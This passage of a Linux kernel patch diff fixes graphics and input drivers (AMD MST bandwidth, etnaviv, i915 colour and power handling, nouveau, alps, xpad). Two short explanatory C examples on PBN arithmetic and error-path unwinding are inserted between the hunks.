+-			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps);
++			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps, fec_overhead_multiplier_x1000);
+ 			ret = drm_dp_atomic_find_time_slots(state,
+ 							    params[next_index].port->mgr,
+ 							    params[next_index].port,
+@@ -897,6 +931,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	int count = 0;
+ 	int i, k, ret;
+ 	bool debugfs_overwrite = false;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	memset(params, 0, sizeof(params));
+ 
+@@ -958,7 +993,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try no compression */
+ 	for (i = 0; i < count; i++) {
+ 		vars[i + k].aconnector = params[i].aconnector;
+-		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		vars[i + k].dsc_enabled = false;
+ 		vars[i + k].bpp_x16 = 0;
+ 		ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr, params[i].port,
+@@ -977,7 +1012,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try max compression */
+ 	for (i = 0; i < count; i++) {
+ 		if (params[i].compression_possible && params[i].clock_force_enable != DSC_CLK_FORCE_DISABLE) {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = true;
+ 			vars[i + k].bpp_x16 = params[i].bw_range.min_target_bpp_x16;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+@@ -985,7 +1020,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 			if (ret < 0)
+ 				return ret;
+ 		} else {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = false;
+ 			vars[i + k].bpp_x16 = 0;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 97fd70df531bf..1e4ede1e57abd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -34,6 +34,21 @@
+ #define SYNAPTICS_RC_OFFSET        0x4BC
+ #define SYNAPTICS_RC_DATA          0x4C0
+ 
++#define DP_BRANCH_VENDOR_SPECIFIC_START 0x50C
++
++/**
++ * Panamera MST Hub detection
++ * Offset DPCD 050Eh == 0x5A indicates cascaded MST hub case
++ * Check from beginning of branch device vendor specific field (050Ch)
++ */
++#define IS_SYNAPTICS_PANAMERA(branchDevName) (((int)branchDevName[4] & 0xF0) == 0x50 ? 1 : 0)
++#define BRANCH_HW_REVISION_PANAMERA_A2 0x10
++#define SYNAPTICS_CASCADED_HUB_ID  0x5A
++#define IS_SYNAPTICS_CASCADED_PANAMERA(devName, data) ((IS_SYNAPTICS_PANAMERA(devName) && ((int)data[2] == SYNAPTICS_CASCADED_HUB_ID)) ? 1 : 0)
++
++#define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
++#define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
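With the new multiplier, kbps_to_peak_pbn() folds the FEC overhead into the existing fixed-point math: the stream rate gets the 1006/1000 DP margin, then 1031/1000 for 8b/10b FEC (or 1000/1000, i.e. none, for 128b/132b, which accounts for FEC natively), before the 64/(54*8*1000) kbps-to-PBN conversion. A standalone re-derivation mirroring the patched function (plain C; the 12 Gbps input is just an example figure):

#include <stdint.h>
#include <stdio.h>

static int kbps_to_peak_pbn(int kbps, uint16_t fec_x1000)
{
	uint64_t peak_kbps = (uint64_t)kbps;

	peak_kbps *= 1006;	/* +0.6% margin */
	peak_kbps *= fec_x1000;	/* FEC overhead, x1000 fixed point */
	peak_kbps /= 1000 * 1000;
	/* PBN = ceil(peak_kbps * 64 / (54 * 8 * 1000)) */
	return (int)((peak_kbps * 64 + 54 * 8 * 1000 - 1) / (54 * 8 * 1000));
}

int main(void)
{
	printf("8b/10b:    %d PBN\n", kbps_to_peak_pbn(12000000, 1031));
	printf("128b/132b: %d PBN\n", kbps_to_peak_pbn(12000000, 1000));
	return 0;
}

For the 8b/10b case this yields 1844 PBN versus 1789 without the FEC term, which is exactly the headroom the fix reserves.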
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+index 7031db145a77a..3524b5811682a 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+@@ -91,7 +91,15 @@ static void *etnaviv_gem_prime_vmap_impl(struct etnaviv_gem_object *etnaviv_obj)
+ static int etnaviv_gem_prime_mmap_obj(struct etnaviv_gem_object *etnaviv_obj,
+ 		struct vm_area_struct *vma)
+ {
+-	return dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	int ret;
++
++	ret = dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	if (!ret) {
++		/* Drop the reference acquired by drm_gem_mmap_obj(). */
++		drm_gem_object_put(&etnaviv_obj->base);
++	}
++
++	return ret;
+ }
+ 
+ static const struct etnaviv_gem_ops etnaviv_gem_prime_ops = {
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 250e83f1f5ac0..c3928d28cd443 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -514,6 +514,22 @@ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
++static void skl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
++{
++	/*
++	 * Possibly related to display WA #1184, SKL CSC loses the latched
++	 * CSC coeff/offset register values if the CSC registers are disarmed
++	 * between DC5 exit and PSR exit. This will cause the plane(s) to
++	 * output all black (until CSC_MODE is rearmed and properly latched).
++	 * Once PSR exit (and proper register latching) has occurred the
++	 * danger is over. Thus when PSR is enabled the CSC coeff/offset
++	 * register programming will be performed from skl_color_commit_arm()
++	 * which is called after PSR exit.
++	 */
++	if (!crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++}
++
+ static void ilk_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
+ 	ilk_load_csc_matrix(crtc_state);
+@@ -556,6 +572,9 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	enum pipe pipe = crtc->pipe;
+ 	u32 val = 0;
+ 
++	if (crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++
+ 	/*
+ 	 * We don't (yet) allow userspace to control the pipe background color,
+ 	 * so force it to black, but apply pipe gamma and CSC appropriately
+@@ -574,6 +593,25 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 			  crtc_state->csc_mode);
+ }
+ 
++static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++	enum pipe pipe = crtc->pipe;
++
++	/*
++	 * We don't (yet) allow userspace to control the pipe background color,
++	 * so force it to black.
++	 */
++	intel_de_write(i915, SKL_BOTTOM_COLOR(pipe), 0);
++
++	intel_de_write(i915, GAMMA_MODE(crtc->pipe),
++		       crtc_state->gamma_mode);
++
++	intel_de_write_fw(i915, PIPE_CSC_MODE(crtc->pipe),
++			  crtc_state->csc_mode);
++}
++
+ static struct drm_property_blob *
+ create_linear_lut(struct drm_i915_private *i915, int lut_size)
+ {
+@@ -2287,14 +2325,14 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+-	.color_commit_arm = skl_color_commit_arm,
++	.color_commit_arm = icl_color_commit_arm,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+ 
+ static const struct intel_color_funcs glk_color_funcs = {
+ 	.color_check = glk_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = glk_load_luts,
+ 	.read_luts = glk_read_luts,
+@@ -2302,7 +2340,7 @@ static const struct intel_color_funcs glk_color_funcs = {
+ 
+ static const struct intel_color_funcs skl_color_funcs = {
+ 	.color_check = ivb_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = bdw_load_luts,
+ 	.read_luts = NULL,
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 8b6994853f6f8..f0aad2403109b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7107,6 +7107,8 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
++	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
++
+ 	if (!modeset &&
+ 	    intel_crtc_needs_color_update(new_crtc_state))
+ 		intel_color_commit_noarm(new_crtc_state);
+@@ -7480,8 +7482,28 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	if (state->modeset)
+-		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
++	/*
++	 * During full modesets we write a lot of registers, wait
++	 * for PLLs, etc. Doing that while DC states are enabled
++	 * is not a good idea.
++	 *
++	 * During fastsets and other updates we also need to
++	 * disable DC states due to the following scenario:
++	 * 1. DC5 exit and PSR exit happen
++	 * 2. Some or all _noarm() registers are written
++	 * 3. Due to some long delay PSR is re-entered
++	 * 4. DC5 entry -> DMC saves the already written new
++	 *    _noarm() registers and the old not yet written
++	 *    _arm() registers
++	 * 5. DC5 exit -> DMC restores a mixture of old and
++	 *    new register values and arms the update
++	 * 6. PSR exit -> hardware latches a mixture of old and
++	 *    new register values -> corrupted frame, or worse
++	 * 7. New _arm() registers are finally written
++	 * 8. Hardware finally latches a complete set of new
++	 *    register values, and subsequent frames will be OK again
++	 */
++	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7625,8 +7647,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
+-		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
++	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index ad1a37b515fb1..2a9f40a2b3ed0 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -301,6 +301,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 	vm->pte_encode = gen8_ggtt_pte_encode;
+ 
+ 	dpt->obj = dpt_obj;
++	dpt->obj->is_dpt = true;
+ 
+ 	return &dpt->vm;
+ }
+@@ -309,5 +310,6 @@ void intel_dpt_destroy(struct i915_address_space *vm)
+ {
+ 	struct i915_dpt *dpt = i915_vm_to_dpt(vm);
+ 
++	dpt->obj->is_dpt = false;
+ 	i915_vm_put(&dpt->vm);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index 70624b4b2d38c..c5d41fd51118f 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -436,9 +436,9 @@ static bool icl_tc_phy_is_owned(struct intel_digital_port *dig_port)
+ 				PORT_TX_DFLEXDPCSSS(dig_port->tc_phy_fia));
+ 	if (val == 0xffffffff) {
+ 		drm_dbg_kms(&i915->drm,
+-			    "Port %s: PHY in TCCOLD, assume safe mode\n",
++			    "Port %s: PHY in TCCOLD, assume not owned\n",
+ 			    dig_port->tc_port_name);
+-		return true;
++		return false;
+ 	}
+ 
+ 	return val & DP_PHY_MODE_STATUS_NOT_SAFE(dig_port->tc_phy_fia_idx);
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+index 8949fb0a944f6..3198b64ad7dbc 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+@@ -127,7 +127,8 @@ i915_gem_object_create_lmem_from_data(struct drm_i915_private *i915,
+ 
+ 	memcpy(map, data, size);
+ 
+-	i915_gem_object_unpin_map(obj);
++	i915_gem_object_flush_map(obj);
++	__i915_gem_object_release_map(obj);
+ 
+ 	return obj;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index 3db53769864c2..2f53a68348217 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -319,7 +319,7 @@ i915_gem_object_never_mmap(const struct drm_i915_gem_object *obj)
+ static inline bool
+ i915_gem_object_is_framebuffer(const struct drm_i915_gem_object *obj)
+ {
+-	return READ_ONCE(obj->frontbuffer);
++	return READ_ONCE(obj->frontbuffer) || obj->is_dpt;
+ }
+ 
+ static inline unsigned int
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index ab4c2f90a5643..1d0d8ee9d707d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -491,6 +491,9 @@ struct drm_i915_gem_object {
+ 	 */
+ 	unsigned int cache_dirty:1;
+ 
++	/* @is_dpt: Object houses a display page table (DPT) */
++	unsigned int is_dpt:1;
++
+ 	/**
+ 	 * @read_domains: Read memory domains.
+ 	 *
+diff --git a/drivers/gpu/drm/i915/gt/intel_rps.c b/drivers/gpu/drm/i915/gt/intel_rps.c
+index 9ad3bc7201cba..fc73cfe0e39bb 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rps.c
++++ b/drivers/gpu/drm/i915/gt/intel_rps.c
+@@ -2074,16 +2074,6 @@ void intel_rps_sanitize(struct intel_rps *rps)
+ 		rps_disable_interrupts(rps);
+ }
+ 
+-u32 intel_rps_read_rpstat_fw(struct intel_rps *rps)
+-{
+-	struct drm_i915_private *i915 = rps_to_i915(rps);
+-	i915_reg_t rpstat;
+-
+-	rpstat = (GRAPHICS_VER(i915) >= 12) ? GEN12_RPSTAT1 : GEN6_RPSTAT1;
+-
+-	return intel_uncore_read_fw(rps_to_gt(rps)->uncore, rpstat);
+-}
+-
+ u32 intel_rps_read_rpstat(struct intel_rps *rps)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+@@ -2094,7 +2084,7 @@ u32 intel_rps_read_rpstat(struct intel_rps *rps)
+ 	return intel_uncore_read(rps_to_gt(rps)->uncore, rpstat);
+ }
+ 
+-u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
++static u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+ 	u32 cagf;
+@@ -2117,10 +2107,11 @@ u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat)
+ 	return cagf;
+ }
+ 
+-static u32 read_cagf(struct intel_rps *rps)
++static u32 __read_cagf(struct intel_rps *rps, bool take_fw)
+ {
+ 	struct drm_i915_private *i915 = rps_to_i915(rps);
+ 	struct intel_uncore *uncore = rps_to_uncore(rps);
++	i915_reg_t r = INVALID_MMIO_REG;
+ 	u32 freq;
+ 
+ 	/*
+@@ -2128,22 +2119,30 @@ static u32 read_cagf(struct intel_rps *rps)
+ 	 * registers will return 0 freq when GT is in RC6
+ 	 */
+ 	if (GRAPHICS_VER_FULL(i915) >= IP_VER(12, 70)) {
+-		freq = intel_uncore_read(uncore, MTL_MIRROR_TARGET_WP1);
++		r = MTL_MIRROR_TARGET_WP1;
+ 	} else if (GRAPHICS_VER(i915) >= 12) {
+-		freq = intel_uncore_read(uncore, GEN12_RPSTAT1);
++		r = GEN12_RPSTAT1;
+ 	} else if (IS_VALLEYVIEW(i915) || IS_CHERRYVIEW(i915)) {
+ 		vlv_punit_get(i915);
+ 		freq = vlv_punit_read(i915, PUNIT_REG_GPU_FREQ_STS);
+ 		vlv_punit_put(i915);
+ 	} else if (GRAPHICS_VER(i915) >= 6) {
+-		freq = intel_uncore_read(uncore, GEN6_RPSTAT1);
++		r = GEN6_RPSTAT1;
+ 	} else {
+-		freq = intel_uncore_read(uncore, MEMSTAT_ILK);
++		r = MEMSTAT_ILK;
+ 	}
+ 
++	if (i915_mmio_reg_valid(r))
++		freq = take_fw ? intel_uncore_read(uncore, r) : intel_uncore_read_fw(uncore, r);
++
+ 	return intel_rps_get_cagf(rps, freq);
+ }
+ 
++static u32 read_cagf(struct intel_rps *rps)
++{
++	return __read_cagf(rps, true);
++}
++
+ u32 intel_rps_read_actual_frequency(struct intel_rps *rps)
+ {
+ 	struct intel_runtime_pm *rpm = rps_to_uncore(rps)->rpm;
+@@ -2156,7 +2155,12 @@ u32 intel_rps_read_actual_frequency(struct intel_rps *rps)
+ 	return freq;
+ }
+ 
+-u32 intel_rps_read_punit_req(struct intel_rps *rps)
++u32 intel_rps_read_actual_frequency_fw(struct intel_rps *rps)
++{
++	return intel_gpu_freq(rps, __read_cagf(rps, false));
++}
++
++static u32 intel_rps_read_punit_req(struct intel_rps *rps)
+ {
+ 	struct intel_uncore *uncore = rps_to_uncore(rps);
+ 	struct intel_runtime_pm *rpm = rps_to_uncore(rps)->rpm;
+diff --git a/drivers/gpu/drm/i915/gt/intel_rps.h b/drivers/gpu/drm/i915/gt/intel_rps.h
+index 9e1cad9ba0e9c..d86ddfee095ed 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rps.h
++++ b/drivers/gpu/drm/i915/gt/intel_rps.h
+@@ -34,8 +34,8 @@ void intel_rps_mark_interactive(struct intel_rps *rps, bool interactive);
+ 
+ int intel_gpu_freq(struct intel_rps *rps, int val);
+ int intel_freq_opcode(struct intel_rps *rps, int val);
+-u32 intel_rps_get_cagf(struct intel_rps *rps, u32 rpstat1);
+ u32 intel_rps_read_actual_frequency(struct intel_rps *rps);
++u32 intel_rps_read_actual_frequency_fw(struct intel_rps *rps);
+ u32 intel_rps_get_requested_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_min_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_min_raw_freq(struct intel_rps *rps);
+@@ -46,10 +46,8 @@ int intel_rps_set_max_frequency(struct intel_rps *rps, u32 val);
+ u32 intel_rps_get_rp0_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_rp1_frequency(struct intel_rps *rps);
+ u32 intel_rps_get_rpn_frequency(struct intel_rps *rps);
+-u32 intel_rps_read_punit_req(struct intel_rps *rps);
+ u32 intel_rps_read_punit_req_frequency(struct intel_rps *rps);
+ u32 intel_rps_read_rpstat(struct intel_rps *rps);
+-u32 intel_rps_read_rpstat_fw(struct intel_rps *rps);
+ void gen6_rps_get_freq_caps(struct intel_rps *rps, struct intel_rps_freq_caps *caps);
+ void intel_rps_raise_unslice(struct intel_rps *rps);
+ void intel_rps_lower_unslice(struct intel_rps *rps);
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 125b6ca25a756..7d5e2c53c23a7 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -1592,9 +1592,7 @@ static void i915_oa_stream_destroy(struct i915_perf_stream *stream)
+ 	/*
+ 	 * Wa_16011777198:dg2: Unset the override of GUCRC mode to enable rc6.
+ 	 */
+-	if (intel_uc_uses_guc_rc(&gt->uc) &&
+-	    (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_C0) ||
+-	     IS_DG2_GRAPHICS_STEP(gt->i915, G11, STEP_A0, STEP_B0)))
++	if (stream->override_gucrc)
+ 		drm_WARN_ON(&gt->i915->drm,
+ 			    intel_guc_slpc_unset_gucrc_mode(&gt->uc.guc.slpc));
+ 
+@@ -3293,8 +3291,10 @@ static int i915_oa_stream_init(struct i915_perf_stream *stream,
+ 		if (ret) {
+ 			drm_dbg(&stream->perf->i915->drm,
+ 				"Unable to override gucrc mode\n");
+-			goto err_config;
++			goto err_gucrc;
+ 		}
++
++		stream->override_gucrc = true;
+ 	}
+ 
+ 	ret = alloc_oa_buffer(stream);
+@@ -3333,11 +3333,15 @@ err_enable:
+ 	free_oa_buffer(stream);
+ 
+ err_oa_buf_alloc:
+-	free_oa_configs(stream);
++	if (stream->override_gucrc)
++		intel_guc_slpc_unset_gucrc_mode(&gt->uc.guc.slpc);
+ 
++err_gucrc:
+ 	intel_uncore_forcewake_put(stream->uncore, FORCEWAKE_ALL);
+ 	intel_engine_pm_put(stream->engine);
+ 
++	free_oa_configs(stream);
++
+ err_config:
+ 	free_noa_wait(stream);
+ 
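The error-path reshuffle restores the usual kernel rule for goto unwinding: labels release resources in exact reverse order of acquisition, and the GuC RC override now has its own label plus an undo step, with the new stream->override_gucrc flag recording what was actually taken instead of re-deriving it from stepping/SKU checks at destroy time. A standalone sketch of the idiom (not the i915 code):

#include <stdio.h>

static int acquire(const char *what, int fail)
{
	if (fail) {
		printf("failed to acquire %s\n", what);
		return -1;
	}
	printf("acquired %s\n", what);
	return 0;
}

static int stream_init(int fail_at)
{
	if (acquire("config", fail_at == 1))
		goto err_config;
	if (acquire("gucrc override", fail_at == 2))
		goto err_gucrc;
	if (acquire("oa buffer", fail_at == 3))
		goto err_oa_buf;
	return 0;

err_oa_buf:
	printf("undo gucrc override\n");	/* reverse order */
err_gucrc:
	printf("undo config\n");
err_config:
	return -1;
}

int main(void)
{
	return stream_init(3) ? 1 : 0;
}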
+diff --git a/drivers/gpu/drm/i915/i915_perf_types.h b/drivers/gpu/drm/i915/i915_perf_types.h
+index ca150b7af3f29..4d5d8c365d9e2 100644
+--- a/drivers/gpu/drm/i915/i915_perf_types.h
++++ b/drivers/gpu/drm/i915/i915_perf_types.h
+@@ -316,6 +316,12 @@ struct i915_perf_stream {
+ 	 * buffer should be checked for available data.
+ 	 */
+ 	u64 poll_oa_period;
++
++	/**
++	 * @override_gucrc: GuC RC has been overridden for the perf stream,
++	 * and we need to restore the default configuration on release.
++	 */
++	bool override_gucrc;
+ };
+ 
+ /**
+diff --git a/drivers/gpu/drm/i915/i915_pmu.c b/drivers/gpu/drm/i915/i915_pmu.c
+index 52531ab28c5f5..6d422b056f8a8 100644
+--- a/drivers/gpu/drm/i915/i915_pmu.c
++++ b/drivers/gpu/drm/i915/i915_pmu.c
+@@ -393,14 +393,12 @@ frequency_sample(struct intel_gt *gt, unsigned int period_ns)
+ 		 * case we assume the system is running at the intended
+ 		 * frequency. Fortunately, the read should rarely fail!
+ 		 */
+-		val = intel_rps_read_rpstat_fw(rps);
+-		if (val)
+-			val = intel_rps_get_cagf(rps, val);
+-		else
+-			val = rps->cur_freq;
++		val = intel_rps_read_actual_frequency_fw(rps);
++		if (!val)
++			val = intel_gpu_freq(rps, rps->cur_freq);
+ 
+ 		add_sample_mult(&pmu->sample[__I915_SAMPLE_FREQ_ACT],
+-				intel_gpu_freq(rps, val), period_ns / 1000);
++				val, period_ns / 1000);
+ 	}
+ 
+ 	if (pmu->enable & config_mask(I915_PMU_REQUESTED_FREQUENCY)) {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_backlight.c b/drivers/gpu/drm/nouveau/nouveau_backlight.c
+index 40409a29f5b69..91b5ecc575380 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_backlight.c
++++ b/drivers/gpu/drm/nouveau/nouveau_backlight.c
+@@ -33,6 +33,7 @@
+ #include <linux/apple-gmux.h>
+ #include <linux/backlight.h>
+ #include <linux/idr.h>
++#include <drm/drm_probe_helper.h>
+ 
+ #include "nouveau_drv.h"
+ #include "nouveau_reg.h"
+@@ -299,8 +300,12 @@ nv50_backlight_init(struct nouveau_backlight *bl,
+ 	struct nouveau_drm *drm = nouveau_drm(nv_encoder->base.base.dev);
+ 	struct nvif_object *device = &drm->client.device.object;
+ 
++	/*
++	 * Note that when this runs the connectors have not been probed yet,
++	 * so nv_conn->base.status is not set yet.
++	 */
+ 	if (!nvif_rd32(device, NV50_PDISP_SOR_PWM_CTL(ffs(nv_encoder->dcb->or) - 1)) ||
+-	    nv_conn->base.status != connector_status_connected)
++	    drm_helper_probe_detect(&nv_conn->base, NULL, false) != connector_status_connected)
+ 		return -ENODEV;
+ 
+ 	if (nv_conn->type == DCB_CONNECTOR_eDP) {
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index f060ac7376e69..cfeb24d40d378 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,7 +168,13 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-	raw_local_irq_disable();
++
++	/*
++	 * The lockdep hardirqs state may be changed to 'on' by a timer
++	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
++	 * to keep the hardirqs state correct.
++	 */
++	local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 2959d80f7fdb6..cd36cf7165423 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -779,9 +779,6 @@ static void xpad_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char *d
+ 	input_report_key(dev, BTN_C, data[8]);
+ 	input_report_key(dev, BTN_Z, data[9]);
+ 
+-	/* Profile button has a value of 0-3, so it is reported as an axis */
+-	if (xpad->mapping & MAP_PROFILE_BUTTON)
+-		input_report_abs(dev, ABS_PROFILE, data[34]);
+ 
+ 	input_sync(dev);
+ }
+@@ -1059,6 +1056,10 @@ static void xpadone_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char
+ 					(__u16) le16_to_cpup((__le16 *)(data + 8)));
+ 		}
+ 
++		/* Profile button has a value of 0-3, so it is reported as an axis */
++		if (xpad->mapping & MAP_PROFILE_BUTTON)
++			input_report_abs(dev, ABS_PROFILE, data[34]);
++
+ 		/* paddle handling */
+ 		/* based on SDL's SDL_hidapi_xboxone.c */
+ 		if (xpad->mapping & MAP_PADDLES) {
+diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c
+index 989228b5a0a44..e2c11d9f3868f 100644
+--- a/drivers/input/mouse/alps.c
++++ b/drivers/input/mouse/alps.c
+@@ -852,8 +852,8 @@ static void alps_process_packet_v6(struct psmouse *psmouse)
+ 			x = y = z = 0;
+ 
+ 		/* Divide 4 since trackpoint's speed is too fast */
+-		input_report_rel(dev2, REL_X, (char)x / 4);
+-		input_report_rel(dev2, REL_Y, -((char)y / 4));
++		input_report_rel(dev2, REL_X, (s8)x / 4);
++		input_report_rel(dev2, REL_Y, -((s8)y / 4));
+ 
+ 		psmouse_report_standard_buttons(dev2, packet[3]);
+ 
+@@ -1104,8 +1104,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse)
+ 	    ((packet[3] & 0x20) << 1);
+ 	z = (packet[5] & 0x3f) | ((packet[3] & 0x80) >> 1);
+ 
+-	input_report_rel(dev2, REL_X, (char)x);
+-	input_report_rel(dev2, REL_Y, -((char)y));
++	input_report_rel(dev2, REL_X, (s8)x);
++	input_report_rel(dev2, REL_Y, -((s8)y));
+ 	input_report_abs(dev2, ABS_PRESSURE, z);
+ 
+ 	psmouse_report_standard_buttons(dev2, packet[1]);
+@@ -2294,20 +2294,20 @@ static int alps_get_v3_v7_resolution(struct psmouse *psmouse, int reg_pitch)
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_pitch = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_pitch = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_pitch = 50 + 2 * x_pitch; /* In 0.1 mm units */
